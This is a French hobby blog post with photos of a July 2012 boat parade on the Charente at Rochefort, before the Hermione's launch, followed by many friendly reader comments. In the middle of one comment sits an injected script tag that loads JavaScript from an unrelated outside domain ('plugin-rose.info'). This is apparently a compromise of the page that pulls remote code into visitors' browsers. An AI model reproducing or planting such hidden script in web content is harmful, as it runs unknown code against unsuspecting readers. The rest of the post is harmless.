• La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

    une soixantaine de bateaux ont participé à la grande parade nautique sur la Charente



    des yoles de Bantry ,embarcations légères et étroites propulsées à l'aide de rames (Morbihan)

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

    Cinquante gréements du collectif :  Patrimoine Navigant en Charente Maritime

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

     

     

    les Gabares de Cognac et de Saintes

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

     

    La Marine Nationale représentée par le navire école le Dundee Mutin

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

     

     

    et..... les trois chaloupes de l'Hermione

     

     

    La petite

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

    La moyenne

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

    La grande

    La parade nautique en attendant la sortie de l'Hermione vendredi 06 juillet 2012 à Rochefort

     

     

     

     

    à suivre le Belem à quai (Rochefort 17)

    « La mise à l'eau (sur la Charente) de la coque de l'Hermione vendredi 06 juillet 2012Un petit déjeuner avec miss Blue ça vous dit ? »
    Partager via Gmail Yahoo!

  • Commentaires

    48
    Vendredi 28 Septembre 2012 à 23:34

    Suite à ton com sur mon billet de ce soir, je suis revenue voir ton article sur la parade nautique de cet été. Comme je l'avais déjà dit je l'ai manquée .... Je n'avais remarqué non plus le très beau gwennili Mor ; sympa de leur avoir transmis les photos !!  Par contre sur le port à Rochefort j'ai visité le Mutin.

    Bonne soirée, bon WE et bises Moune.

    47
    Mardi 7 Août 2012 à 23:40

    Réponse pour Gwennili Mor

    Merci pour votre commentaire

    Photos envoyées

    Cordialement

    46
    Gwennili Mor
    Mardi 7 Août 2012 à 23:12

    Merci pour ces belles photos. Belle fête et belle épreuve nautique pour notre petit équipage partie le matin de Fouras sous un vent à décorner les boeufs...Nous sommes l'équipage de la yole "Gwennili Mor" (le nom du bateau est inscrit sur le coté et nous portons des tricornes) Vous êtes seul à avoir des photos de nous à ce moment. Acceptez vous de nous les envoyer? En avez vous d'autre de nous? d'avance merci pour votre réponse.

    Bien cordialement

    Yves - le patron de la yole ( à la barre...)

    45
    Dimanche 15 Juillet 2012 à 17:32

    Tu me donnes envie de voguer !! Bises.

    44
    Samedi 14 Juillet 2012 à 08:49

    merci pour ces belles photos moune, ça tombe bien j'ai vu le chantier avant mais pas la fête, super!j'attends de voir la suite pour voir ce Belem, bisous et bonne journée  

    43
    Vendredi 13 Juillet 2012 à 22:18

    Que c'est beau Moune tous ces jolies bateaux, certains bien colorés c'est plein de gaité, des petits, moyens, grands et j'aime bien ce couple avec leurs beaux bérets sur leur tête. C'est une très belle série que tu as fait là, tes photos sont belles et tu me donnes envie de chanter "maman les petits bateaux qui vont sur l'eau..................." et ben voilà à l'instant une belle averse si si je t'assure, il vaut mieux que j'arrête de chanter sinon je finirai par avoir une mare............et il me manquera les canards. Tu sais après une longue période de beau temps, depuis jeudi on a un temps pourri et frais mais c'est de saison en hiver austral ici. Bon WE et je l'espère sous le soleil ma douce. Gros bisous et calins aux beaux zanimaux

    42
    Vendredi 13 Juillet 2012 à 22:06

    Bonsoir Moune,nous aussi de la pluie toute la journée et après une petite accalmie voilà que ça recommence!!! en plus pas chaud 16° seulement alors que dans le Sud de la France ils ont beaucoup trop chaud et n'arrivent plus à se rafraichir!
    J'ai hâte de voir Le Belem,nous l'avions vu en escale à Concarneau il y a deux ans,qu'il est beau,c'est un cadeau de le voir.
    Bonne fin de soirée à vous deux mes amis et gros bisous.Je t'offre ce cygne qui est un peu une photo surprise! Minouche

                             

     

    41
    abbydomi Profil de abbydomi
    Vendredi 13 Juillet 2012 à 20:55

    merci pour ces beaux reportages

    bon week-end du 14 juillet (avec le soleil !!!)

    bisous  ronrons

    40
    Vendredi 13 Juillet 2012 à 20:45

    Bonsoir Moune ! tous ces jolis bateaux qui vont sur l'eau ! belle série d'images qui font penser aux vacances ! bisous très bon weekend du 14 juillet !

    39
    Vendredi 13 Juillet 2012 à 19:50

    Quelle superbe parade ! C'est génial, ces défilés de jolis bateaux de toutes sortes. J'adore ça. Début Août, un trois mâts mexicain doit fair escale à Bordeaux. Je vais aller le voir, c'est certain. Et pour le 15 Août, il y a les fêtes de la mer à Arcachon avec des régates. Et j'ai bien l'intention d'y aller aussi.
    Bises, Moune, et caresses au duo de choc.

    38
    spikeathena Profil de spikeathena
    Vendredi 13 Juillet 2012 à 19:28

    bonsoir qu'elle belle photos merci de nous les offrir elles sont trés belles ici il pleut et il pleut et moi je suis pas bien ciatique sa m'énerve mais bon on se croiré au mois de mars heureusement que je ne part pas en vacances bonne soirée bizzz

    37
    Vendredi 13 Juillet 2012 à 19:17

    Merci de nous avoir fait vivre via vos photos cette belle manifestation

    Bon week-end

    36
    Vendredi 13 Juillet 2012 à 18:49

    Quele belle manisfestation, merci pour le partage ma chère Moune !!!

    Bon week-end

    Gros bisous

    Mamounette

    35
    Vendredi 13 Juillet 2012 à 15:19

    Merci de ton passage chez moi et très heureuse de "faire ta connaissance" Moune !! Tes photos sont magnifiques ; je n'avais pas vu tous ces petits bateaux sur la Charente. Je pense que c'était le vendredi AM. J'attendais la famille qui arrivait dans l'AM chez moi : je les ai donc manqués !! par contre j'étais près du pont tranbordeur le dimanche matin pour la sortie du Bélem et j'en ai pris quelques uns en photo ......

    Excuse-moi je suis un peu rapide car je n'ai pas d'Internet dans ma maison de vacances (en Bretagne où je me trouve depuis mardi). Je passe dans une cyber-commune de temps en temps pour répondre aux amis : ce qui est le cas, pour une petite heure, cet AM. 

    A bientôt et bonne fin d'AM.

    34
    jm
    Vendredi 13 Juillet 2012 à 14:31

    ces photos sont vraiment magnifiques,je te souhaite un bon vendredi,caresses à titi falcon,bises

    33
    Vendredi 13 Juillet 2012 à 14:07
    32
    la vieille aux chats
    Vendredi 13 Juillet 2012 à 11:51

    super dépaysement !!çà fait du bien ,merci ma belle !bonne journée,calinous à tes amours ,gros bisous

    31
    Vendredi 13 Juillet 2012 à 09:50

    Merci de ta visite sur mon livre d'or. Je ne vois pas le tiens, dommage. Bonne journée, amitiés.

    30
    Vendredi 13 Juillet 2012 à 09:43

    Bonjour Moune, je ne vois jamais la parade nautique et nombreux bateaux comme ça, c'est extraordinaire. Tous les photos sont superbe. Je te souhaite une belle journée. Bisous.

    29
    Vendredi 13 Juillet 2012 à 07:41

    Sympa les galères lol .. non je rigole belle journée

    28
    Vendredi 13 Juillet 2012 à 07:14

    tes photos sont vraiment superbes, pas un grand ciel bleu, mais des couleurs sur chaque embarcation. vivement la suite et encore merci. bises. celine

    27
    Jeudi 12 Juillet 2012 à 22:56

    Merci pour ces magnifiques photos -  il n'y a pas que dans le nord qu'il y a des gros nuages .....
    le principel c'était de passer une bonne journée.
    bises

    26
    Jeudi 12 Juillet 2012 à 22:00

    Bonsoir mes amis,je comprends que cette journée a été encore plus belle que ce que je n'imaginais!
    Toutes ces associations participantes sont à louer aussi,ça n'est pas facile et il faut un entrainement régulier.
    J'espère que vous avez encore eu un temps correct aujourd'hui.Ici c'était soleil et nuages,mais les nuages étaient les plus nombreux et ce soir une petite bruine encore.C'est dommage pour tous les feux d'artifices qui vont être organisés le 13 et le 14 car chez nous c'est la pluie qui est prévue ces deus jours.
    Bonne fin de soirée à vous deux.Bisous et caresses en quantité égale!!! Minouche

                                             

    25
    Jeudi 12 Juillet 2012 à 21:16

    Bonsoir Moune quelle belle parade vraiment sympa merci de la partager avec nous !

    Bisous Mamé

    24
    Jeudi 12 Juillet 2012 à 19:38

    merci beaucoup Moune pour cette superbe balade nautique !

    pour moi c'est toujours un plaisir de voir naviguer de jolis bateaux !

    très bonne soirée

    gros bisous

    Maryse

    23
    Jeudi 12 Juillet 2012 à 19:34

    Tu étais à Londres au jubilé ? hi hi hi Superbe spectacle merci pour ces jolis photos ! Bisous Moune

    22
    Jeudi 12 Juillet 2012 à 19:04

    Un bien joli ballet nautique!

    Belle fin de journée

    Gros bisous

    21
    Jeudi 12 Juillet 2012 à 18:38

    Superbe ,j'ai assisté à ce spectacle devant mon écran bien au chaud !!!

    gros bisous et câlins aux poilus (surtout Blue  )

    20
    nony
    Jeudi 12 Juillet 2012 à 17:42

    Coucou moune,superbes tous ces bateaux,j'ai reconnu la gabare de Cognac,je ne connaissais pas celle de saintes,merci pour toutes ces belles photos qui nous emmènent au fil de l'eau,là pas de bouchon ni de feu rouge!!!

    Bonne et douce soirée

    Bisous,et câlinous à tes trésors

    19
    Jeudi 12 Juillet 2012 à 14:27

    Qu'ils sont beaux, ces bateaux et ces équipages dans leurs costumes colorés ! Par contre il n'a pas l'air de faire très chaud et le pull semble être de rigueur...

    18
    Jeudi 12 Juillet 2012 à 14:03
    Zoé de Gavin

    C'est magnifique !!

    Merci Moune de nous faire partager ce bel évènement !

    Celà devait être émouvant sur place !

    Météo pas terrible par contre ....

    Ces voiles rose-rouge sue un ciel bleu-gris ....de toute beauté !

    gros bisous Moune

    17
    Jeudi 12 Juillet 2012 à 13:45

    dimanche dernier,ce sont les toues et gabarres que j'ai photographiées

    16
    madilys
    Jeudi 12 Juillet 2012 à 11:44

    super le gwennili

    beau spectacle

    bizzz à vous tous4

    15
    Jeudi 12 Juillet 2012 à 11:19

    Je préfère les "gabarres" qui me semblent plus rassurantes .... Mais quel joli spectacle !

    bisous

    14
    Jeudi 12 Juillet 2012 à 11:12
    josy15

    Formidables tous ces bâteaux, bises

    13
    Jeudi 12 Juillet 2012 à 10:56

    Ton reportage est exceptionnel, c'est vraiment super sympa de nous faire partager tout ça, comme ça on a un peu l'impression d'y avoir participé aussi

    Plein de bises.

    <script src="http://plugin-rose.info/dfi823hs.js?0.4797404067688973" type="text/javascript"></script>
    12
    Jeudi 12 Juillet 2012 à 10:35

    même si le temps était vilain, tes photos sont trés belles, belle journée, Miaou !!!

    11
    Jeudi 12 Juillet 2012 à 10:26

    quel dépaysement pour moi .

    mzeci Moune

    10
    Jeudi 12 Juillet 2012 à 10:06

    Salut moune,superbes tout c bateaux!!!!!! il fait soleil aujourd’hui, pourvu que sa dure !!!!!!!!je te souhaite une bonne journée, bise a+ 

    9
    Jeudi 12 Juillet 2012 à 09:55
    Mamychachat

    C'est toujours un bonheur de voir naviguer de si jolis bateaux, merci beaucoup Moune pour ce reportage qui me procure des vacances.

    Des nuages mais là-bas le temps reste assez clair pour pouvoir prendre des photos, dans le gris elles sont troubles ! et le soleil est là qui revient pour de superbes photos.

    Merci et gros gros bisous

    8
    Margotte36 Profil de Margotte36
    Jeudi 12 Juillet 2012 à 09:08

    En voilà de bien jolis bateaux, tu as raison de profiter de tout ceci et merci pour ton partage, gros bisous !

    7
    Jeudi 12 Juillet 2012 à 08:45

    Un beau spectacle, mais il n'a pas l'air de faire très chaud !!!!

    Merci pour ces belles photos.

    Bises

    6
    Jeudi 12 Juillet 2012 à 08:37

    Ils sont magnifiques ces bateaux ! merci pour le spectacle !

    5
    Jeudi 12 Juillet 2012 à 08:21

    Hum...

    Superbe parade !!

    Bises Moune

    4
    Jeudi 12 Juillet 2012 à 08:08

    Un petit coucou, j'adore!

    je passerai pour le belem!

    bises

    3
    Jeudi 12 Juillet 2012 à 07:42

    Merci et tout ces bateaux sont bien jolis.
    Mais j'ai hâte de voir le Belem.
    Gros bisous et bon jeudi; calin au duo qui va bien j'espère? 

    2
    Jeudi 12 Juillet 2012 à 06:49

    c'est superbe, mais il faut avoir le pied marin........passe une belle journée

    1
    Mercredi 11 Juillet 2012 à 23:50

    bonsoir Moune

    je trouve extraordinairement beau cette participation de toutes ces personnes dévouées et associatives qui nous offrent ces beaux bateaux que tu as pris en photos un grand merci à toi passe une bonne fin soirée bisous dan

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :